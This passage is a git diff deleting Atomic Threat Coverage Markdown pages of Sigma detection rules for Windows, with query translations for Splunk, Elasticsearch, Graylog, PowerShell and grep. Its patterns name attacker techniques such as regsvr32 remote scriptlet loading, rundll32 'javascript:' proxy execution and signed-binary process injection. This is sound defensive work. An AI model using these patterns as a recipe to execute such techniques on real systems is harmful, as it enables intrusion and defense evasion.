-(event_id="1" ((Image="*\\regsvr32.exe" CommandLine="*\\Temp\\*") OR (Image="*\\regsvr32.exe" ParentImage="*\\powershell.exe") OR (Image="*\\regsvr32.exe" ParentImage="*\\cmd.exe") OR (Image="*\\regsvr32.exe" CommandLine IN ["*/i:http* scrobj.dll", "*/i:ftp* scrobj.dll"]) OR (Image="*\\wscript.exe" ParentImage="*\\regsvr32.exe") OR (Image="*\\EXCEL.EXE" CommandLine="*..\\..\\..\\Windows\\System32\\regsvr32.exe *")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\regsvr32\.exe)(?=.*.*\Temp\\.*))|.*(?:.*(?=.*.*\regsvr32\.exe)(?=.*.*\powershell\.exe))|.*(?:.*(?=.*.*\regsvr32\.exe)(?=.*.*\cmd\.exe))|.*(?:.*(?=.*.*\regsvr32\.exe)(?=.*(?:.*.*/i:http.* scrobj\.dll|.*.*/i:ftp.* scrobj\.dll)))|.*(?:.*(?=.*.*\wscript\.exe)(?=.*.*\regsvr32\.exe))|.*(?:.*(?=.*.*\EXCEL\.EXE)(?=.*.*\.\.\\.\.\\.\.\Windows\System32\regsvr32\.exe .*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_dctask64.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_dctask64.md
deleted file mode 100644
index 6d88d6c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_dctask64.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Renamed ZOHO Dctask64       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown yet</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/gN3mes1s/status/1222088214581825540](https://twitter.com/gN3mes1s/status/1222088214581825540)</li><li>[https://twitter.com/gN3mes1s/status/1222095963789111296](https://twitter.com/gN3mes1s/status/1222095963789111296)</li><li>[https://twitter.com/gN3mes1s/status/1222095371175911424](https://twitter.com/gN3mes1s/status/1222095371175911424)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed ZOHO Dctask64
-id: 340a090b-c4e9-412e-bb36-b4b16fe96f9b
-status: experimental
-description: Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation
-references:
-    - https://twitter.com/gN3mes1s/status/1222088214581825540
-    - https://twitter.com/gN3mes1s/status/1222095963789111296
-    - https://twitter.com/gN3mes1s/status/1222095371175911424
-author: Florian Roth
-date: 2020/01/28
-tags:
-    - attack.defense_evasion
-    - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Imphash: '6834B1B94E49701D77CCB3C0895E1AFD'
-    filter:
-        Image|endswith: '\dctask64.exe'
-    condition: selection and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - ParentImage
-falsepositives:
-    - Unknown yet
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Imphash.*6834B1B94E49701D77CCB3C0895E1AFD" -and  -not ($_.message -match "Image.*.*\\dctask64.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Imphash:("6834B1B94E49701D77CCB3C0895E1AFD" OR "6834b1b94e49701d77ccb3c0895e1afd") AND (NOT (winlog.event_data.Image.keyword:*\\dctask64.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/340a090b-c4e9-412e-bb36-b4b16fe96f9b <<EOF
-{
-  "metadata": {
-    "title": "Renamed ZOHO Dctask64",
-    "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1055"
-    ],
-    "query": "(winlog.event_data.Imphash:(\"6834B1B94E49701D77CCB3C0895E1AFD\" OR \"6834b1b94e49701d77ccb3c0895e1afd\") AND (NOT (winlog.event_data.Image.keyword:*\\\\dctask64.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Imphash:(\"6834B1B94E49701D77CCB3C0895E1AFD\" OR \"6834b1b94e49701d77ccb3c0895e1afd\") AND (NOT (winlog.event_data.Image.keyword:*\\\\dctask64.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed ZOHO Dctask64'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n      ParentImage = {{_source.ParentImage}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Imphash:("6834B1B94E49701D77CCB3C0895E1AFD" "6834b1b94e49701d77ccb3c0895e1afd") AND (NOT (Image.keyword:*\\dctask64.exe)))
-```
-
-
-### splunk
-    
-```
-(Imphash="6834B1B94E49701D77CCB3C0895E1AFD" NOT (Image="*\\dctask64.exe")) | table CommandLine,ParentCommandLine,ParentImage
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Imphash="6834B1B94E49701D77CCB3C0895E1AFD"  -(Image="*\\dctask64.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*6834B1B94E49701D77CCB3C0895E1AFD)(?=.*(?!.*(?:.*(?=.*.*\dctask64\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_debugview.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_debugview.md
deleted file mode 100644
index eb2a224..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_renamed_debugview.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Renamed SysInternals Debug View       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious renamed SysInternals DebugView execution |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.epicturla.com/blog/sysinturla](https://www.epicturla.com/blog/sysinturla)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed SysInternals Debug View
-id: cd764533-2e07-40d6-a718-cfeec7f2da7f
-status: experimental
-description: Detects suspicious renamed SysInternals DebugView execution
-references:
-    - https://www.epicturla.com/blog/sysinturla
-author: Florian Roth
-date: 2020/05/28
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Product: 
-            - 'Sysinternals DebugView'
-            - 'Sysinternals Debugview'
-    filter:
-        OriginalFilename: 'Dbgview.exe'
-        Image|endswith: '\Dbgview.exe'
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Sysinternals DebugView" -or $_.message -match "Sysinternals Debugview") -and  -not ($_.message -match "OriginalFilename.*Dbgview.exe" -and $_.message -match "Image.*.*\\Dbgview.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(Product:("Sysinternals\ DebugView" OR "Sysinternals\ Debugview") AND (NOT (OriginalFilename:"Dbgview.exe" AND winlog.event_data.Image.keyword:*\\Dbgview.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cd764533-2e07-40d6-a718-cfeec7f2da7f <<EOF
-{
-  "metadata": {
-    "title": "Renamed SysInternals Debug View",
-    "description": "Detects suspicious renamed SysInternals DebugView execution",
-    "tags": "",
-    "query": "(Product:(\"Sysinternals\\ DebugView\" OR \"Sysinternals\\ Debugview\") AND (NOT (OriginalFilename:\"Dbgview.exe\" AND winlog.event_data.Image.keyword:*\\\\Dbgview.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(Product:(\"Sysinternals\\ DebugView\" OR \"Sysinternals\\ Debugview\") AND (NOT (OriginalFilename:\"Dbgview.exe\" AND winlog.event_data.Image.keyword:*\\\\Dbgview.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed SysInternals Debug View'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Product:("Sysinternals DebugView" "Sysinternals Debugview") AND (NOT (OriginalFilename:"Dbgview.exe" AND Image.keyword:*\\Dbgview.exe)))
-```
-
-
-### splunk
-    
-```
-((Product="Sysinternals DebugView" OR Product="Sysinternals Debugview") NOT (OriginalFilename="Dbgview.exe" Image="*\\Dbgview.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Product IN ["Sysinternals DebugView", "Sysinternals Debugview"]  -(OriginalFilename="Dbgview.exe" Image="*\\Dbgview.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*Sysinternals DebugView|.*Sysinternals Debugview))(?=.*(?!.*(?:.*(?=.*Dbgview\.exe)(?=.*.*\Dbgview\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rottenpotato.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rottenpotato.md
deleted file mode 100644
index dc8572a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rottenpotato.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | RottenPotato Like Attack Pattern       |
-|:-------------------------|:------------------|
-| **Description**          | Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1171: LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1195284233729777665](https://twitter.com/SBousseaden/status/1195284233729777665)</li></ul>  |
-| **Author**               | @SBousseaden, Florian Roth |
-| Other Tags           | <ul><li>attack.t1557.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: RottenPotato Like Attack Pattern
-id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f
-status: experimental
-description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
-references:
-    - https://twitter.com/SBousseaden/status/1195284233729777665
-author: "@SBousseaden, Florian Roth"
-date: 2019/11/15
-tags:
-    - attack.privilege_escalation
-    - attack.credential_access
-    - attack.t1171
-    - attack.t1557.001
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4624
-        LogonType: 3
-        TargetUserName: 'ANONYMOUS_LOGON'
-        WorkstationName: '-'
-        SourceNetworkAddress: '127.0.0.1'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4624" -and $_.message -match "LogonType.*3" -and $_.message -match "TargetUserName.*ANONYMOUS_LOGON" -and $_.message -match "WorkstationName.*-" -and $_.message -match "SourceNetworkAddress.*127.0.0.1") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4624" AND winlog.event_data.LogonType:"3" AND TargetUserName:"ANONYMOUS_LOGON" AND winlog.event_data.WorkstationName:"\-" AND SourceNetworkAddress:"127.0.0.1")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/16f5d8ca-44bd-47c8-acbe-6fc95a16c12f <<EOF
-{
-  "metadata": {
-    "title": "RottenPotato Like Attack Pattern",
-    "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.credential_access",
-      "attack.t1171",
-      "attack.t1557.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"3\" AND TargetUserName:\"ANONYMOUS_LOGON\" AND winlog.event_data.WorkstationName:\"\\-\" AND SourceNetworkAddress:\"127.0.0.1\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"3\" AND TargetUserName:\"ANONYMOUS_LOGON\" AND winlog.event_data.WorkstationName:\"\\-\" AND SourceNetworkAddress:\"127.0.0.1\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'RottenPotato Like Attack Pattern'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4624" AND LogonType:"3" AND TargetUserName:"ANONYMOUS_LOGON" AND WorkstationName:"\-" AND SourceNetworkAddress:"127.0.0.1")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4624" LogonType="3" TargetUserName="ANONYMOUS_LOGON" WorkstationName="-" SourceNetworkAddress="127.0.0.1")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4624" logon_type="3" TargetUserName="ANONYMOUS_LOGON" WorkstationName="-" SourceNetworkAddress="127.0.0.1")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4624)(?=.*3)(?=.*ANONYMOUS_LOGON)(?=.*-)(?=.*127\.0\.0\.1))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_run_locations.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_run_locations.md
deleted file mode 100644
index c148b3e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_run_locations.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Suspicious Process Start Locations       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process run from unusual locations |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://car.mitre.org/wiki/CAR-2013-05-002](https://car.mitre.org/wiki/CAR-2013-05-002)</li></ul>  |
-| **Author**               | juju4 |
-| Other Tags           | <ul><li>car.2013-05-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Process Start Locations
-id: 15b75071-74cc-47e0-b4c6-b43744a62a2b
-description: Detects suspicious process run from unusual locations
-status: experimental
-references:
-    - https://car.mitre.org/wiki/CAR-2013-05-002
-author: juju4
-date: 2019/01/16
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-    - car.2013-05-002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*:\RECYCLER\\*'
-            - '*:\SystemVolumeInformation\\*'
-            - 'C:\\Windows\\Tasks\\*'
-            - 'C:\\Windows\\debug\\*'
-            - 'C:\\Windows\\fonts\\*'
-            - 'C:\\Windows\\help\\*'
-            - 'C:\\Windows\\drivers\\*'
-            - 'C:\\Windows\\addins\\*'
-            - 'C:\\Windows\\cursors\\*'
-            - 'C:\\Windows\\system32\tasks\\*'
-
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*:\\RECYCLER\\.*" -or $_.message -match "Image.*.*:\\SystemVolumeInformation\\.*" -or $_.message -match "Image.*C:\\Windows\\Tasks\\.*" -or $_.message -match "Image.*C:\\Windows\\debug\\.*" -or $_.message -match "Image.*C:\\Windows\\fonts\\.*" -or $_.message -match "Image.*C:\\Windows\\help\\.*" -or $_.message -match "Image.*C:\\Windows\\drivers\\.*" -or $_.message -match "Image.*C:\\Windows\\addins\\.*" -or $_.message -match "Image.*C:\\Windows\\cursors\\.*" -or $_.message -match "Image.*C:\\Windows\\system32\\tasks\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*\:\\RECYCLER\\* OR *\:\\SystemVolumeInformation\\* OR C\:\\Windows\\Tasks\\* OR C\:\\Windows\\debug\\* OR C\:\\Windows\\fonts\\* OR C\:\\Windows\\help\\* OR C\:\\Windows\\drivers\\* OR C\:\\Windows\\addins\\* OR C\:\\Windows\\cursors\\* OR C\:\\Windows\\system32\\tasks\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/15b75071-74cc-47e0-b4c6-b43744a62a2b <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Process Start Locations",
-    "description": "Detects suspicious process run from unusual locations",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036",
-      "car.2013-05-002"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*\\:\\\\RECYCLER\\\\* OR *\\:\\\\SystemVolumeInformation\\\\* OR C\\:\\\\Windows\\\\Tasks\\\\* OR C\\:\\\\Windows\\\\debug\\\\* OR C\\:\\\\Windows\\\\fonts\\\\* OR C\\:\\\\Windows\\\\help\\\\* OR C\\:\\\\Windows\\\\drivers\\\\* OR C\\:\\\\Windows\\\\addins\\\\* OR C\\:\\\\Windows\\\\cursors\\\\* OR C\\:\\\\Windows\\\\system32\\\\tasks\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*\\:\\\\RECYCLER\\\\* OR *\\:\\\\SystemVolumeInformation\\\\* OR C\\:\\\\Windows\\\\Tasks\\\\* OR C\\:\\\\Windows\\\\debug\\\\* OR C\\:\\\\Windows\\\\fonts\\\\* OR C\\:\\\\Windows\\\\help\\\\* OR C\\:\\\\Windows\\\\drivers\\\\* OR C\\:\\\\Windows\\\\addins\\\\* OR C\\:\\\\Windows\\\\cursors\\\\* OR C\\:\\\\Windows\\\\system32\\\\tasks\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Process Start Locations'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*\:\\RECYCLER\\* *\:\\SystemVolumeInformation\\* C\:\\Windows\\Tasks\\* C\:\\Windows\\debug\\* C\:\\Windows\\fonts\\* C\:\\Windows\\help\\* C\:\\Windows\\drivers\\* C\:\\Windows\\addins\\* C\:\\Windows\\cursors\\* C\:\\Windows\\system32\\tasks\\*)
-```
-
-
-### splunk
-    
-```
-(Image="*:\\RECYCLER\\*" OR Image="*:\\SystemVolumeInformation\\*" OR Image="C:\\Windows\\Tasks\\*" OR Image="C:\\Windows\\debug\\*" OR Image="C:\\Windows\\fonts\\*" OR Image="C:\\Windows\\help\\*" OR Image="C:\\Windows\\drivers\\*" OR Image="C:\\Windows\\addins\\*" OR Image="C:\\Windows\\cursors\\*" OR Image="C:\\Windows\\system32\\tasks\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*:\\RECYCLER\\*", "*:\\SystemVolumeInformation\\*", "C:\\Windows\\Tasks\\*", "C:\\Windows\\debug\\*", "C:\\Windows\\fonts\\*", "C:\\Windows\\help\\*", "C:\\Windows\\drivers\\*", "C:\\Windows\\addins\\*", "C:\\Windows\\cursors\\*", "C:\\Windows\\system32\\tasks\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*:\RECYCLER\\.*|.*.*:\SystemVolumeInformation\\.*|.*C:\\Windows\\Tasks\\.*|.*C:\\Windows\\debug\\.*|.*C:\\Windows\\fonts\\.*|.*C:\\Windows\\help\\.*|.*C:\\Windows\\drivers\\.*|.*C:\\Windows\\addins\\.*|.*C:\\Windows\\cursors\\.*|.*C:\\Windows\\system32\tasks\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_activity.md
deleted file mode 100644
index 43655c7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_activity.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Suspicious Rundll32 Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process related to rundll32 based on arguments |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/](http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/)</li><li>[https://twitter.com/Hexacorn/status/885258886428725250](https://twitter.com/Hexacorn/status/885258886428725250)</li><li>[https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52](https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52)</li></ul>  |
-| **Author**               | juju4 |
-| Other Tags           | <ul><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Rundll32 Activity
-id: e593cf51-88db-4ee1-b920-37e89012a3c9
-description: Detects suspicious process related to rundll32 based on arguments
-status: experimental
-references:
-    - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
-    - https://twitter.com/Hexacorn/status/885258886428725250
-    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1085
-    - attack.t1218.011
-author: juju4
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\rundll32.exe* url.dll,*OpenURL *'
-            - '*\rundll32.exe* url.dll,*OpenURLA *'
-            - '*\rundll32.exe* url.dll,*FileProtocolHandler *'
-            - '*\rundll32.exe* zipfldr.dll,*RouteTheCall *'
-            - '*\rundll32.exe* Shell32.dll,*Control_RunDLL *'
-            - '*\rundll32.exe javascript:*'
-            - '* url.dll,*OpenURL *'
-            - '* url.dll,*OpenURLA *'
-            - '* url.dll,*FileProtocolHandler *'
-            - '* zipfldr.dll,*RouteTheCall *'
-            - '* Shell32.dll,*Control_RunDLL *'
-            - '* javascript:*'
-            - '*.RegisterXLL*'
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
